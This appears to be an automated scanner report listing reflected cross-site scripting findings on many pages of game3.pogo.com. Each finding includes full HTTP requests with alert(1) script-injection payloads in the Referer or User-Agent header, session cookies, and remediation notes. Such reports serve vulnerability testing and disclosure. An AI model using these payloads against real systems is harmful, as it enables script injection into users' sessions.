Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /error/java-problem.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=24687</script><script>alert(1)</script>491924de1e5
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload dfd05</script><script>alert(1)</script>57005f1f7dd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/game/game.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=dfd05</script><script>alert(1)</script>57005f1f7dd
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 563d3</script><script>alert(1)</script>491f0c3cf was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/intermission.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=563d3</script><script>alert(1)</script>491f0c3cf
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 162d4</script><script>alert(1)</script>71d830df306 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/loading/loading.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=162d4</script><script>alert(1)</script>71d830df306
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 426d2</script><script>alert(1)</script>f5b0c4ef6b6 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /exhibit/loading/loading.jsp?pwid=760&phei=574&site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=426d2</script><script>alert(1)</script>f5b0c4ef6b6
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_pers=%20s_nr%3D1294536852604-New%7C1297128852604%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a6dd7</script><script>alert(1)</script>d5e3f275c69 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/autoplay-table.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=a6dd7</script><script>alert(1)</script>d5e3f275c69
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload bd068</script><script>alert(1)</script>2fcbd332d20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/chatshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=bd068</script><script>alert(1)</script>2fcbd332d20
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2aeb8</script><script>alert(1)</script>0cac953bca4 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/controlshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=2aeb8</script><script>alert(1)</script>0cac953bca4
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ce6a2</script><script>alert(1)</script>79f70fb7d5a was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/dashshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=ce6a2</script><script>alert(1)</script>79f70fb7d5a
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 804dd</script><script>alert(1)</script>f9fb6bee1c1 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/frameset.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=804dd</script><script>alert(1)</script>f9fb6bee1c1
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 39631</script><script>alert(1)</script>d147f5bfa20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/game.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=39631</script><script>alert(1)</script>d147f5bfa20
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7b9b</script><script>alert(1)</script>8b1c40b04d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/game/gameshell.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=d7b9b</script><script>alert(1)</script>8b1c40b04d0
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 11234</script><script>alert(1)</script>444be4cd02c was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/init.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=11234</script><script>alert(1)</script>444be4cd02c
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d33b9</script><script>alert(1)</script>3100c016d20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/jvmtest.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=d33b9</script><script>alert(1)</script>3100c016d20
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a4313"><script>alert(1)</script>cb56d21662f was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /room/loading/jvmtest.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Proxy-Connection: keep-alive
Referer: http://game3.pogo.com/room/loading/init.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.224 Safari/534.10a4313"><script>alert(1)</script>cb56d21662f
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_sq=%5B%5BB%5D%5D; op600clubpogogum=a00200200a2719m0337lk0d3e; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B
The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 57849</script><script>alert(1)</script>2e30affd4d0 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/loading.jsp HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
Referer: http://www.google.com/search?hl=en&q=57849</script><script>alert(1)</script>2e30affd4d0
The value of the User-Agent HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c728b</script><script>alert(1)</script>38c7dbac39a was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script>alert(1)</script>38c7dbac39a
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
function setVisible(elementName, visible) {
elementToChangeState = getElementReference(elementName);
//alert('found element
...[SNIP]...
<param name="browserInfo" value="Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)c728b</script><script>alert(1)</script>38c7dbac39a">
...[SNIP]...
The value of the User-Agent HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 73c5e"><script>alert(1)</script>3ef13ef919 was submitted in the User-Agent HTTP header. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.
Request
GET /room/loading/loading.jsp?site=pogo&scrn=k7240&rkey=scrabble-plscrabblesf357&anam=Temporary+Room+102&apid=autoratedrules&rspt=11909&ahst=game3.pogo.com&ugifts=0&rhst=www.pogo.com&game=scrabble&auto=PlayNow HTTP/1.1
Host: game3.pogo.com
Accept: */*
Accept-Language: en
User-Agent: 73c5e"><script>alert(1)</script>3ef13ef919
Connection: close
Cookie: com.pogo.unid=6606480040153856; com.pogo.lkey=TRB7pR5Zmd6Ko2z1Cn4zUAAAKMQ.; s_pers=%20s_nr%3D1294536855963-New%7C1297128855963%3B; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; op600clubpogoliid=a00200200a2719m0337lk0d3e; s_sq=%5B%5BB%5D%5D; prod.JID=269399119AD6ABD961A8F9470FD2EF87.000161; com.pogo.hp.ls.cfg=0; op600clubpogogum=a00200200a2719m0337lk0d3e;
